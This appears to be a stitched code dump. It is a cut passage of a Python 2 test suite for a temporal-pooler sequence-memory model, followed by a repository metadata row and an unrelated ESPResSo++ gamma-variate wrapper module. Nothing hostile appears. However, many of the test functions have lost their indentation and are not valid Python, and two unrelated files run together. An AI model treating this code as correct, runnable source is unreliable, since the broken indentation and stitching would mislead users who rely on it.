for _ in range(nTests): # Test that configuration several times
trainingSet = buildTrainingSet(numSequences =numSequences,
sequenceLength = sequenceLength,
pctShared = 0.0,
subsequenceStartPos = 0,
numCols = numCols,
minOnes = 15, maxOnes = 20)
numFailures, numStrictErrors, numPerfect, tp = \
testSequence(trainingSet,
nTrainingReps = 2,
numberOfCols = numCols,
cellsPerColumn = 4,
initialPerm = .8,
connectedPerm = .7,
minThreshold = 11,
permanenceInc = .4,
permanenceDec = 0,
permanenceMax = 1,
globalDecay = .0,
newSynapseCount = 11,
activationThreshold = 8,
doPooling = False)
if numFailures == 0:
print "Test B3 ok"
else:
print "Test B3 failed"
nFailed = nFailed + 1
print "numFailures=", numFailures
print "numStrictErrors=", numStrictErrors
print "numPerfect=", numPerfect
return nFailed
#---------------------------------------------------------------------------------
def TestH0(numOnes = 5,nMultiStepPrediction=0):
cellsPerColumn = 4
print "Higher order test 0 with cellsPerColumn=",cellsPerColumn
trainingSet = buildSimpleTrainingSet(numOnes)
numFailures, numStrictErrors, numPerfect, tp = \
testSequence(trainingSet,
nTrainingReps = 20,
numberOfCols = trainingSet[0][0][0].size,
cellsPerColumn = cellsPerColumn,
initialPerm = .8,
connectedPerm = .7,
minThreshold = 6,
permanenceInc = .4,
permanenceDec = .2,
permanenceMax = 1,
globalDecay = .0,
newSynapseCount = 5,
activationThreshold = 4,
doPooling = False,
nMultiStepPrediction=nMultiStepPrediction)
if numFailures == 0 and \
numStrictErrors == 0 and \
numPerfect == len(trainingSet[0])*(len(trainingSet[0][0]) - 1):
print "Test PASS"
return 0
else:
print "Test FAILED"
print "numFailures=", numFailures
print "numStrictErrors=", numStrictErrors
print "numPerfect=", numPerfect
return 1
#---------------------------------------------------------------------------------
def TestH(sequenceLength, nTests, cellsPerColumn, numCols =100, nSequences =[2],
          pctShared = 0.1, seqGenMode = 'shared sequence', nTrainingReps = 2,
          shouldFail = False, compareToPy = False, highOrder = False):
  """Generic higher-order sequence memory test.

  For each value in nSequences, builds sequences (optionally sharing a
  subsequence starting at position 10), trains and tests via
  testSequence(), and counts configurations whose pass/fail outcome
  disagrees with the shouldFail expectation.  Returns the number of
  failed configurations.

  NOTE(review): nSequences has a mutable default list; it is only
  iterated here, so this is safe as long as callers never mutate it.
  """
  nFailed = 0

  subsequenceStartPos = 10
  assert subsequenceStartPos < sequenceLength

  for numSequences in nSequences:
    print "Higher order test with sequenceLength=",sequenceLength,
    print "cellsPerColumn=",cellsPerColumn,"nTests=",nTests,
    print "numSequences=",numSequences, "pctShared=", pctShared

    for _ in range(nTests): # Test that configuration several times

      trainingSet = buildTrainingSet(numSequences = numSequences,
                                     sequenceLength = sequenceLength,
                                     pctShared = pctShared, seqGenMode = seqGenMode,
                                     subsequenceStartPos = subsequenceStartPos,
                                     numCols = numCols,
                                     minOnes = 21, maxOnes = 25)

      numFailures, numStrictErrors, numPerfect, tp = \
          testSequence(trainingSet,
                       nTrainingReps = nTrainingReps,
                       numberOfCols = numCols,
                       cellsPerColumn = cellsPerColumn,
                       initialPerm = .8,
                       connectedPerm = .7,
                       minThreshold = 12,
                       permanenceInc = .4,
                       permanenceDec = .1,
                       permanenceMax = 1,
                       globalDecay = .0,
                       newSynapseCount = 11,
                       activationThreshold = 8,
                       doPooling = False,
                       shouldFail = shouldFail,
                       compareToPy = compareToPy,
                       highOrder = highOrder)

      # A run "passes" when its failure count matches the shouldFail
      # expectation for this configuration.
      if numFailures == 0 and not shouldFail \
         or numFailures > 0 and shouldFail:
        print "Test PASS",
        if shouldFail:
          print '(should fail, and failed)'
        else:
          print
      else:
        print "Test FAILED"
        nFailed = nFailed + 1
        print "numFailures=", numFailures
        print "numStrictErrors=", numStrictErrors
        print "numPerfect=", numPerfect

  return nFailed
#---------------------------------------------------------------------------------
def TestH11(numOnes = 3):
cellsPerColumn = 4
print "Higher order test 11 with cellsPerColumn=",cellsPerColumn
trainingSet = buildAlternatingTrainingSet(numOnes= 3)
numFailures, numStrictErrors, numPerfect, tp = \
testSequence(trainingSet,
nTrainingReps = 1,
numberOfCols = trainingSet[0][0][0].size,
cellsPerColumn = cellsPerColumn,
initialPerm = .8,
connectedPerm = .7,
minThreshold = 6,
permanenceInc = .4,
permanenceDec = 0,
permanenceMax = 1,
globalDecay = .0,
newSynapseCount = 1,
activationThreshold = 1,
doPooling = False)
if numFailures == 0 and \
numStrictErrors == 0 and \
numPerfect == len(trainingSet[0])*(len(trainingSet[0][0]) - 1):
print "Test PASS"
return 0
else:
print "Test FAILED"
print "numFailures=", numFailures
print "numStrictErrors=", numStrictErrors
print "numPerfect=", numPerfect
return 1
#---------------------------------------------------------------------------------
def TestH2a(sequenceLength, nTests, cellsPerColumn, numCols =100, nSequences =[2],
            pctShared = 0.02, seqGenMode = 'shared sequence',
            shouldFail = False):
  """Check that repeated training on the same data does not keep adding
  segments/synapses: trains the same set for 10, 2 and 1 repetitions and
  requires the 1-rep and 2-rep segment/synapse counts to agree within a
  small tolerance.  Returns the number of failed configurations.

  Still need to test:
  Two overlapping sequences. OK to get new segments but check that we can
  get correct high order prediction after multiple reps.
  """
  print "Test H2a - second repetition of the same sequence should not add synapses"
  nFailed = 0

  subsequenceStartPos = 10
  assert subsequenceStartPos < sequenceLength

  for numSequences in nSequences:
    print "Higher order test with sequenceLength=",sequenceLength,
    print "cellsPerColumn=",cellsPerColumn,"nTests=",nTests,"numCols=", numCols
    print "numSequences=",numSequences, "pctShared=", pctShared,
    print "sharing mode=", seqGenMode

    for _ in range(nTests): # Test that configuration several times

      trainingSet = buildTrainingSet(numSequences = numSequences,
                                     sequenceLength = sequenceLength,
                                     pctShared = pctShared, seqGenMode = seqGenMode,
                                     subsequenceStartPos = subsequenceStartPos,
                                     numCols = numCols,
                                     minOnes = 21, maxOnes = 25)

      # Many repetitions (with permanence decay) — used only for diagnostics.
      print "============== 10 ======================"
      numFailures3, numStrictErrors3, numPerfect3, tp3 = \
          testSequence(trainingSet,
                       nTrainingReps = 10,
                       numberOfCols = numCols,
                       cellsPerColumn = cellsPerColumn,
                       initialPerm = .4,
                       connectedPerm = .7,
                       minThreshold = 12,
                       permanenceInc = .1,
                       permanenceDec = 0.1,
                       permanenceMax = 1,
                       globalDecay = .0,
                       newSynapseCount = 15,
                       activationThreshold = 12,
                       doPooling = False,
                       shouldFail = shouldFail)

      # Two repetitions — compared against the single repetition below.
      print "============== 2 ======================"
      numFailures, numStrictErrors, numPerfect, tp2 = \
          testSequence(trainingSet,
                       nTrainingReps = 2,
                       numberOfCols = numCols,
                       cellsPerColumn = cellsPerColumn,
                       initialPerm = .8,
                       connectedPerm = .7,
                       minThreshold = 12,
                       permanenceInc = .1,
                       permanenceDec = 0,
                       permanenceMax = 1,
                       globalDecay = .0,
                       newSynapseCount = 15,
                       activationThreshold = 12,
                       doPooling = False,
                       shouldFail = shouldFail)

      # Single repetition baseline.
      print "============== 1 ======================"
      numFailures1, numStrictErrors1, numPerfect1, tp1 = \
          testSequence(trainingSet,
                       nTrainingReps = 1,
                       numberOfCols = numCols,
                       cellsPerColumn = cellsPerColumn,
                       initialPerm = .8,
                       connectedPerm = .7,
                       minThreshold = 12,
                       permanenceInc = .1,
                       permanenceDec = 0,
                       permanenceMax = 1,
                       globalDecay = .0,
                       newSynapseCount = 15,
                       activationThreshold = 12,
                       doPooling = False,
                       shouldFail = shouldFail)

      # Check that training with a second pass did not result in more synapses.
      # getSegmentInfo()[0] is the segment count, [1] the synapse count;
      # allow a slack of 3 segments / 3*15 synapses.
      segmentInfo1 = tp1.getSegmentInfo()
      segmentInfo2 = tp2.getSegmentInfo()
      if (abs(segmentInfo1[0] - segmentInfo2[0]) > 3) or \
         (abs(segmentInfo1[1] - segmentInfo2[1]) > 3*15) :
        print "Training twice incorrectly resulted in too many segments or synapses"
        print segmentInfo1
        print segmentInfo2
        print tp3.getSegmentInfo()
        tp3.trimSegments()
        print tp3.getSegmentInfo()
        print "Failures for 1, 2, and N reps"
        print numFailures1, numStrictErrors1, numPerfect1
        print numFailures, numStrictErrors, numPerfect
        print numFailures3, numStrictErrors3, numPerfect3
        numFailures += 1

      # A run "passes" when its failure count matches the shouldFail
      # expectation for this configuration.
      if numFailures == 0 and not shouldFail \
         or numFailures > 0 and shouldFail:
        print "Test PASS",
        if shouldFail:
          print '(should fail, and failed)'
        else:
          print
      else:
        print "Test FAILED"
        nFailed = nFailed + 1
        print "numFailures=", numFailures
        print "numStrictErrors=", numStrictErrors
        print "numPerfect=", numPerfect

  return nFailed
#---------------------------------------------------------------------------------
def TestP(sequenceLength, nTests, cellsPerColumn, numCols =300, nSequences =[2],
          pctShared = 0.1, seqGenMode = 'shared subsequence', nTrainingReps = 2):
  """Pooling test: trains with doPooling = True and requires every
  prediction to be perfect (numPerfect == numSequences*(sequenceLength-1)).
  Returns the number of failed configurations.

  NOTE(review): nSequences has a mutable default list; it is only
  iterated here, so this is safe as long as callers never mutate it.
  """
  nFailed = 0

  newSynapseCount = 7
  activationThreshold = newSynapseCount - 2
  minOnes = 1.5 * newSynapseCount
  maxOnes = .3 * numCols / nTrainingReps

  for numSequences in nSequences:
    print "Pooling test with sequenceLength=",sequenceLength,
    print 'numCols=', numCols,
    print "cellsPerColumn=",cellsPerColumn,"nTests=",nTests,
    print "numSequences=",numSequences, "pctShared=", pctShared,
    print "nTrainingReps=", nTrainingReps, "minOnes=", minOnes,
    print "maxOnes=", maxOnes

    for _ in range(nTests): # Test that configuration several times

      # Re-assigned each iteration (same value as the initial computation).
      minOnes = 1.5 * newSynapseCount

      trainingSet = buildTrainingSet(numSequences =numSequences,
                                     sequenceLength = sequenceLength,
                                     pctShared = pctShared, seqGenMode = seqGenMode,
                                     subsequenceStartPos = 10,
                                     numCols = numCols,
                                     minOnes = minOnes, maxOnes = maxOnes)

      numFailures, numStrictErrors, numPerfect, tp = \
          testSequence(trainingSet,
                       nTrainingReps = nTrainingReps,
                       numberOfCols = numCols,
                       cellsPerColumn = cellsPerColumn,
                       initialPerm = .8,
                       connectedPerm = .7,
                       minThreshold = 11,
                       permanenceInc = .4,
                       permanenceDec = 0,
                       permanenceMax = 1,
                       globalDecay = .0,
                       newSynapseCount = newSynapseCount,
                       activationThreshold = activationThreshold,
                       doPooling = True)

      if numFailures == 0 and \
         numStrictErrors == 0 and \
         numPerfect == numSequences*(sequenceLength - 1):
        print "Test PASS"
      else:
        print "Test FAILED"
        print "numFailures=", numFailures
        print "numStrictErrors=", numStrictErrors
        print "numPerfect=", numPerfect
        nFailed = nFailed + 1

  return nFailed
#---------------------------------------------------------------------------------
def TestHL0a(numOnes = 5):
cellsPerColumn = 4
newSynapseCount = 5
activationThreshold = newSynapseCount
print "HiLo test 0a with cellsPerColumn=",cellsPerColumn
trainingSet, testSet = buildHL0aTrainingSet()
numCols = trainingSet[0][0].size
numFailures, numStrictErrors, numPerfect, tp = \
testSequence([trainingSet],
nTrainingReps = 1,
numberOfCols = numCols,
cellsPerColumn = cellsPerColumn,
initialPerm = .2,
connectedPerm = .7,
permanenceInc = .2,
permanenceDec = 0.05,
permanenceMax = 1,
globalDecay = .0,
minThreshold = activationThreshold,
newSynapseCount = newSynapseCount,
activationThreshold = activationThreshold,
pamLength = 2,
doPooling = False,
testSequences = testSet)
tp.trimSegments()
retAfter = tp.getSegmentInfo()
print retAfter[0], retAfter[1]
if retAfter[0] > 20:
print "Too many segments"
numFailures += 1
if retAfter[1] > 100:
print "Too many synapses"
numFailures += 1
if numFailures == 0:
print "Test HL0a ok"
return 0
else:
print "Test HL0a failed"
print "numFailures=", numFailures
print "numStrictErrors=", numStrictErrors
print "numPerfect=", numPerfect
return 1
#---------------------------------------------------------------------------------
def TestHL0b(numOnes = 5):
cellsPerColumn = 4
newSynapseCount = 5
activationThreshold = newSynapseCount
print "HiLo test 0b with cellsPerColumn=",cellsPerColumn
trainingSet, testSet = buildHL0bTrainingSet()
numCols = trainingSet[0][0].size
print "numCols=", numCols
numFailures, numStrictErrors, numPerfect, tp = \
testSequence([trainingSet],
nTrainingReps = 1,
numberOfCols = numCols,
cellsPerColumn = cellsPerColumn,
initialPerm = .2,
connectedPerm = .7,
permanenceInc = .2,
permanenceDec = 0.05,
permanenceMax = 1,
globalDecay = .0,
minThreshold = activationThreshold,
newSynapseCount = newSynapseCount,
activationThreshold = activationThreshold,
doPooling = False,
testSequences = testSet)
tp.trimSegments()
retAfter = tp.getSegmentInfo()
tp.printCells()
if numFailures == 0:
print "Test HL0 ok"
return 0
else:
print "Test HL0 failed"
print "numFailures=", numFailures
print "numStrictErrors=", numStrictErrors
print "numPerfect=", numPerfect
return 1
#---------------------------------------------------------------------------------
def TestHL(sequenceLength, nTests, cellsPerColumn, numCols =200, nSequences =[2],
pctShared = 0.1, seqGenMode = 'shared subsequence', nTrainingReps = 3,
noiseModel = 'xor binomial in learning only', noiseLevel = 0.1,
hiloOn = True):
nFailed = 0
newSynapseCount = 8
activationThreshold = newSynapseCount
minOnes = 1.5 * newSynapseCount
maxOnes = 0.3 * numCols / nTrainingReps
if hiloOn == False:
minThreshold = 0.9
for numSequences in nSequences:
print "Hilo test with sequenceLength=", sequenceLength,
print "cellsPerColumn=", cellsPerColumn, "nTests=", nTests,
print "numSequences=", numSequences, "pctShared=", pctShared,
print "nTrainingReps=", nTrainingReps, "minOnes=", minOnes,
print "maxOnes=", maxOnes,
print 'noiseModel=', noiseModel, 'noiseLevel=', noiseLevel
for _ in range(nTests): # Test that configuration several times
minOnes = 1.5 * newSynapseCount
trainingSet = buildTrainingSet(numSequences =numSequences,
sequenceLength = sequenceLength,
pctShared = pctShared, seqGenMode = seqGenMode,
subsequenceStartPos = 10,
numCols = numCols,
minOnes = minOnes, maxOnes = maxOnes)
numFailures, numStrictErrors, numPerfect, tp = \
testSequence(trainingSet,
nTrainingReps = nTrainingReps,
numberOfCols = numCols,
cellsPerColumn = cellsPerColumn,
initialPerm = .2,
connectedPerm = .7,
minThreshold = activationThreshold,
newSynapseCount = newSynapseCount,
activationThreshold = activationThreshold,
permanenceInc = .2,
permanenceDec = 0.05,
permanenceMax = 1,
globalDecay = .0,
doPooling = False,
noiseModel = noiseModel,
noiseLevel = noiseLevel)
if numFailures == 0 and \
numStrictErrors == 0 and \
numPerfect == numSequences*(sequenceLength - 1):
print "Test PASS"
else:
print "Test FAILED"
print "numFailures=", numFailures
print "numStrictErrors=", numStrictErrors
print "numPerfect=", numPerfect
nFailed = nFailed + 1
return nFailed
#-------------------------------------------------------------------------------
def worker(x):
  """Worker function to use in parallel hub capacity test below.

  `x` is a (cellsPerColumn, numSequences) pair. Runs two experiments via the
  module-level helpers `buildTrainingSet`/`testSequence`: one with a shared
  one-pattern subsequence (a "hub") and one with no shared subsequence, and
  returns the result counters of both as a flat tuple.

  NOTE(review): indentation below reconstructed (whitespace lost in this copy).
  """
  cellsPerColumn, numSequences = x[0], x[1]
  nTrainingReps = 1
  sequenceLength = 10
  numCols = 200
  print 'Started', cellsPerColumn, numSequences
  # Experiment 1: sequences sharing a single hub pattern.
  seqGenMode = 'shared subsequence, one pattern'
  subsequenceStartPos = 5
  trainingSet = buildTrainingSet(numSequences = numSequences,
                                 sequenceLength = sequenceLength,
                                 pctShared = .1, seqGenMode = seqGenMode,
                                 subsequenceStartPos = subsequenceStartPos,
                                 numCols = numCols,
                                 minOnes = 21, maxOnes = 25)
  numFailures1, numStrictErrors1, numPerfect1, atHub, tp = \
      testSequence(trainingSet,
                   nTrainingReps = nTrainingReps,
                   numberOfCols = numCols,
                   cellsPerColumn = cellsPerColumn,
                   initialPerm = .8,
                   connectedPerm = .7,
                   minThreshold = 11,
                   permanenceInc = .4,
                   permanenceDec = 0,
                   permanenceMax = 1,
                   globalDecay = .0,
                   newSynapseCount = 8,
                   activationThreshold = 8,
                   doPooling = False,
                   shouldFail = False,
                   predJustAfterHubOnly = 5)
  # Experiment 2: control run with no shared subsequence.
  seqGenMode = 'no shared subsequence'
  trainingSet = buildTrainingSet(numSequences = numSequences,
                                 sequenceLength = sequenceLength,
                                 pctShared = 0, seqGenMode = seqGenMode,
                                 subsequenceStartPos = 0,
                                 numCols = numCols,
                                 minOnes = 21, maxOnes = 25)
  numFailures2, numStrictErrors2, numPerfect2, tp = \
      testSequence(trainingSet,
                   nTrainingReps = nTrainingReps,
                   numberOfCols = numCols,
                   cellsPerColumn = cellsPerColumn,
                   initialPerm = .8,
                   connectedPerm = .7,
                   minThreshold = 11,
                   permanenceInc = .4,
                   permanenceDec = 0,
                   permanenceMax = 1,
                   globalDecay = .0,
                   newSynapseCount = 8,
                   activationThreshold = 8,
                   doPooling = False,
                   shouldFail = False)
  print 'Completed',
  print cellsPerColumn, numSequences, numFailures1, numStrictErrors1, numPerfect1, atHub, \
      numFailures2, numStrictErrors2, numPerfect2
  return cellsPerColumn, numSequences, numFailures1, numStrictErrors1, numPerfect1, atHub, \
      numFailures2, numStrictErrors2, numPerfect2
#---------------------------------------------------------------------------------
def hubCapacity():
  """
  Study hub capacity. Figure out how many sequences can share a pattern
  for a given number of cells per column till we the system fails.
  DON'T RUN IN BUILD SYSTEM!!! (takes too long)

  Fans `worker` (defined above) out over a 2-process pool for every
  (cellsPerColumn, numSequences) combination and dumps the raw result
  tuples to a text file in the current directory.
  """
  from multiprocessing import Pool
  import itertools
  print "Hub capacity test"
  # scalar value on predictions by looking at max perm over column
  p = Pool(2)
  results = p.map(worker, itertools.product([1,2,3,4,5,6,7,8], xrange(1,2000,200)))
  f = open('results-numPerfect.11.22.10.txt', 'w')
  for i,r in enumerate(results):
    # Each result is a 9-tuple; written as a C-style initializer row.
    print >>f, '{%d,%d,%d,%d,%d,%d,%d,%d,%d},' % r
  f.close()
#---------------------------------------------------------------------------------
def runTests(testLength = "short"):
  """Run the TP test battery and assert at the end if any test failed.

  Each TestX helper returns a failure count which is accumulated in `tests`.
  Reads the module-level globals `numUniquePatterns` and `nTests` set by the
  __main__ driver below.

  NOTE(review): leading whitespace was lost in this copy; the nesting of the
  `if True:` / `if False:` sections below is a reconstruction -- verify
  against upstream before relying on exactly which tests are enabled.
  NOTE(review): the disabled HL1..HL6 calls pass keyword arguments
  (`doResets`, `numUniquePatterns`) that the visible TestHL signature does
  not accept; they would raise TypeError if re-enabled.
  """
  # Data structure to collect results of tests
  # TODO: put numFailures, numStrictErrors and numPerfect in here for reporting
  tests = {}
  # always run this one: if that one fails, we can't do anything
  basicTest()
  print
  #---------------------------------------------------------------------------------
  if testLength == "long":
    tests['B1'] = TestB1(numUniquePatterns, nTests)
    tests['B2'] = TestB2(numUniquePatterns, nTests)
    tests['B8'] = TestB7(4, nTests, cellsPerColumn = 4, name="B8")
    tests['B10'] = TestB2(numUniquePatterns, nTests, cellsPerColumn = 4,
                          name = "B10")
  # Run these always
  tests['B3'] = TestB3(numUniquePatterns, nTests)
  tests['B6'] = TestB1(numUniquePatterns, nTests,
                       cellsPerColumn = 4, name="B6")
  tests['B7'] = TestB7(numUniquePatterns, nTests)
  print
  #---------------------------------------------------------------------------------
  #print "Test H11"
  #tests['H11'] = TestH11()
  if True:
    print "Test H0"
    tests['H0'] = TestH0(numOnes = 5)
    print "Test H2"
    #tests['H2'] = TestH(numUniquePatterns, nTests, cellsPerColumn = 4,
    #                    nTrainingReps = numUniquePatterns, compareToPy = False)
    print "Test H3"
    tests['H3'] = TestH(numUniquePatterns, nTests,
                        numCols = 200,
                        cellsPerColumn = 20,
                        pctShared = 0.3, nTrainingReps=numUniquePatterns,
                        compareToPy = False,
                        highOrder = True)
    print "Test H4" # Produces 3 false positives, but otherwise fine.
    # TODO: investigate initial false positives?
    tests['H4'] = TestH(numUniquePatterns, nTests,
                        cellsPerColumn = 20,
                        pctShared = 0.1,
                        seqGenMode='shared subsequence at beginning')
  if True:
    print "Test H0 with multistep prediction"
    tests['H0_MS'] = TestH0(numOnes = 5, nMultiStepPrediction=2)
  if True:
    print "Test H1" # - Should Fail
    tests['H1'] = TestH(numUniquePatterns, nTests,
                        cellsPerColumn = 1, nTrainingReps = 1,
                        shouldFail = True)
  # Also fails in --long mode. See H2 above
  #print "Test H2a"
  #tests['H2a'] = TestH2a(numUniquePatterns,
  #                       nTests, pctShared = 0.02, numCols = 300, cellsPerColumn = 4)
  if False:
    print "Test H5" # make sure seqs are good even with shuffling, fast learning
    tests['H5'] = TestH(numUniquePatterns, nTests,
                        cellsPerColumn = 10,
                        pctShared = 0.0,
                        seqGenMode='shuffle, no shared subsequence')
    print "Test H6" # should work
    tests['H6'] = TestH(numUniquePatterns, nTests,
                        cellsPerColumn = 10,
                        pctShared = 0.4,
                        seqGenMode='shuffle, shared subsequence')
    # Try with 2 sequences, then 3 sequences interleaved so that there is
    # always a shared pattern, but it belongs to 2 different sequences each
    # time!
    #print "Test H7"
    #tests['H7'] = TestH(numUniquePatterns, nTests,
    #                    cellsPerColumn = 10,
    #                    pctShared = 0.4,
    #                    seqGenMode='shuffle, shared subsequence')
    # tricky: if start predicting in middle of subsequence, several predictions
    # are possible
    #print "Test H8"
    #tests['H8'] = TestH(numUniquePatterns, nTests,
    #                    cellsPerColumn = 10,
    #                    pctShared = 0.4,
    #                    seqGenMode='shuffle, shared subsequence')
    print "Test H9" # plot hub capacity
    tests['H9'] = TestH(numUniquePatterns, nTests,
                        cellsPerColumn = 10,
                        pctShared = 0.4,
                        seqGenMode='shuffle, shared subsequence')
    #print "Test H10" # plot
    #tests['H10'] = TestH(numUniquePatterns, nTests,
    #                     cellsPerColumn = 10,
    #                     pctShared = 0.4,
    #                     seqGenMode='shuffle, shared subsequence')
  print
  #---------------------------------------------------------------------------------
  if False:
    print "Test P1"
    tests['P1'] = TestP(numUniquePatterns, nTests,
                        cellsPerColumn = 4,
                        pctShared = 0.0,
                        seqGenMode = 'no shared subsequence',
                        nTrainingReps = 3)
  if False:
    print "Test P2"
    tests['P2'] = TestP(numUniquePatterns, nTests,
                        cellsPerColumn = 4,
                        pctShared = 0.0,
                        seqGenMode = 'no shared subsequence',
                        nTrainingReps = 5)
    print "Test P3"
    tests['P3'] = TestP(numUniquePatterns, nTests,
                        cellsPerColumn = 4,
                        pctShared = 0.0,
                        seqGenMode = 'no shared subsequence',
                        nSequences = [2] if testLength == 'short' else [2,5],
                        nTrainingReps = 5)
    print "Test P4"
    tests['P4'] = TestP(numUniquePatterns, nTests,
                        cellsPerColumn = 4,
                        pctShared = 0.0,
                        seqGenMode = 'shared subsequence',
                        nSequences = [2] if testLength == 'short' else [2,5],
                        nTrainingReps = 5)
  print
  #---------------------------------------------------------------------------------
  if True:
    print "Test HL0a"
    tests['HL0a'] = TestHL0a(numOnes = 5)
  if False:
    print "Test HL0b"
    tests['HL0b'] = TestHL0b(numOnes = 5)
    print "Test HL1"
    tests['HL1'] = TestHL(sequenceLength = 20,
                          nTests = nTests,
                          numCols = 100,
                          nSequences = [1],
                          nTrainingReps = 3,
                          cellsPerColumn = 1,
                          seqGenMode = 'no shared subsequence',
                          noiseModel = 'xor binomial in learning only',
                          noiseLevel = 0.1,
                          doResets = False)
    print "Test HL2"
    tests['HL2'] = TestHL(numUniquePatterns = 20,
                          nTests = nTests,
                          numCols = 200,
                          nSequences = [1],
                          nTrainingReps = 3,
                          cellsPerColumn = 1,
                          seqGenMode = 'no shared subsequence',
                          noiseModel = 'xor binomial in learning only',
                          noiseLevel = 0.1,
                          doResets = False)
    print "Test HL3"
    tests['HL3'] = TestHL(numUniquePatterns = 30,
                          nTests = nTests,
                          numCols = 200,
                          nSequences = [2],
                          pctShared = 0.66,
                          nTrainingReps = 3,
                          cellsPerColumn = 1,
                          seqGenMode = 'shared subsequence',
                          noiseModel = None,
                          noiseLevel = 0.0,
                          doResets = True)
    print "Test HL4"
    tests['HL4'] = TestHL(numUniquePatterns = 30,
                          nTests = nTests,
                          numCols = 200,
                          nSequences = [2],
                          pctShared = 0.66,
                          nTrainingReps = 3,
                          cellsPerColumn = 1,
                          seqGenMode = 'shared subsequence',
                          noiseModel = None,
                          noiseLevel = 0.0,
                          doResets = False)
    print "Test HL5"
    tests['HL5'] = TestHL(numUniquePatterns = 30,
                          nTests = nTests,
                          numCols = 200,
                          nSequences = [2],
                          pctShared = 0.66,
                          nTrainingReps = 3,
                          cellsPerColumn = 1,
                          seqGenMode = 'shared subsequence',
                          noiseModel = 'xor binomial in learning only',
                          noiseLevel = 0.1,
                          doResets = False)
    print "Test HL6"
    tests['HL6'] = nTests - TestHL(numUniquePatterns = 20,
                                   nTests = nTests,
                                   numCols = 200,
                                   nSequences = [1],
                                   nTrainingReps = 3,
                                   cellsPerColumn = 1,
                                   seqGenMode = 'no shared subsequence',
                                   noiseModel = 'xor binomial in learning only',
                                   noiseLevel = 0.1,
                                   doResets = True,
                                   hiloOn = False)
  print
  #---------------------------------------------------------------------------------
  # Sum up per-test failure counts and report.
  nFailures = 0
  for k,v in tests.iteritems():
    nFailures = nFailures + v
  if nFailures > 0: # 1 to account for H1
    print "There are failed tests"
    print "Test\tn failures"
    for k,v in tests.iteritems():
      print k, "\t", v
    assert 0
  else:
    print "All tests pass"
#---------------------------------------------------------------------------------
# Keep
# Disabled profiling scaffold: flip to True to profile TestB2 with hotshot
# (Python 2 only; hotshot was removed in Python 3).
if False:
  import hotshot
  import hotshot.stats
  prof = hotshot.Profile("profile.prof")
  prof.runcall(TestB2, numUniquePatterns=100, nTests=2)
  prof.close()
  stats = hotshot.stats.load("profile.prof")
  stats.strip_dirs()
  stats.sort_stats('time', 'calls')
  stats.print_stats(50)
#---------------------------------------------------------------------------------
# Command-line driver: parses --short/--long, --seed N|'rand' and --verbosity N,
# sets the module-level globals read by runTests(), then runs the battery
# (Python TP only in --long mode, plus C++ TP when TEST_CPP_TP is enabled).
# NOTE(review): indentation below reconstructed (whitespace lost in this copy).
if __name__=="__main__":
  if not TEST_CPP_TP:
    print "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
    print "!! WARNING: C++ TP testing is DISABLED until it can be updated."
    print "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
  # Three different test lengths are passed in through the command line.
  # Developer tests use --short. Autobuild does not pass in anything.
  # Acceptance tests pass in --long. testLength reflects these possibilities
  # as "autobuild", "short", and "long"
  testLength = "autobuild"
  # Scan command line arguments to see what to do for the seed
  # TODO: make default be a random seed, once we're sure it will pass reliably!
  for i,arg in enumerate(sys.argv):
    if 'seed' in arg:
      try:
        # used specified seed
        SEED = int(sys.argv[i+1])
      except ValueError as e:
        # random seed
        SEED = numpy.random.randint(100)
    if 'verbosity' in arg:
      VERBOSITY = int(sys.argv[i+1])
    if 'help' in arg:
      print "TPTest.py --short|long --seed number|'rand' --verbosity number"
      sys.exit()
    if "short" in arg:
      testLength = "short"
    if "long" in arg:
      testLength = "long"
  rgen = numpy.random.RandomState(SEED) # always call this rgen, NOT random
  # Setup the severity and length of the tests
  if testLength == "short":
    numUniquePatterns = 50
    nTests = 1
  elif testLength == "autobuild":
    print "Running autobuild tests"
    numUniquePatterns = 50
    nTests = 1
  elif testLength == "long":
    numUniquePatterns = 100
    nTests = 3
  print "TP tests", testLength, "numUniquePatterns=", numUniquePatterns, "nTests=", nTests,
  print "seed=", SEED
  print
  if testLength == "long":
    print 'Testing Python TP'
    TPClass = TP
    runTests(testLength)
  if testLength != 'long':
    checkSynapseConsistency = False
  else:
    # Setting this to True causes test to take way too long
    # Temporarily turned off so we can investigate
    checkSynapseConsistency = False
  if TEST_CPP_TP:
    print 'Testing C++ TP'
    TPClass = TP10X2
    runTests(testLength)
| gpl-3.0 |
MrTheodor/espressopp | src/esutil/GammaVariate.py | 7 | 1686 | # Copyright (C) 2012,2013
# Max Planck Institute for Polymer Research
# Copyright (C) 2008,2009,2010,2011
# Max-Planck-Institute for Polymer Research & Fraunhofer SCAI
#
# This file is part of ESPResSo++.
#
# ESPResSo++ is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo++ is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
r"""
******************************
espressopp.esutil.GammaVariate
******************************
.. function:: espressopp.esutil.GammaVariate(alpha, beta)
    :param alpha: shape parameter of the gamma distribution
    :param beta: scale parameter of the gamma distribution
    :type alpha: real
    :type beta: real
"""
from espressopp import pmi
from _espressopp import esutil_GammaVariate
class GammaVariateLocal(esutil_GammaVariate):
    """Per-rank wrapper around the C++ gamma-variate generator.

    The C++ object is only constructed on ranks that participate in the
    active PMI communicator (or on every rank when no PMI communicator is
    active).
    """
    def __init__(self, alpha, beta):
        # alpha/beta are forwarded verbatim to the C++ constructor.
        if not (pmi._PMIComm and pmi._PMIComm.isActive()) or pmi._MPIcomm.rank in pmi._PMIComm.getMPIcpugroup():
            # NOTE(review): `cxxinit` is not among the imports visible in this
            # chunk (only `pmi` and `esutil_GammaVariate` are imported) --
            # confirm it is imported elsewhere in the file, e.g. from
            # espressopp.esutil, or this raises NameError.
            cxxinit(self, esutil_GammaVariate, alpha, beta)
# On the controller rank only, expose the PMI proxy class that forwards
# calls to GammaVariateLocal instances on all workers.
if pmi.isController:
    class GammaVariate(object):
        __metaclass__ = pmi.Proxy
        # NOTE: this bare string is positioned after __metaclass__, so it is a
        # plain statement, not the class __doc__.
        """A random gamma variate."""
        pmiproxydefs = dict(
            cls = 'espressopp.esutil.GammaVariateLocal',
            localcall = [ '__call__' ],
        )
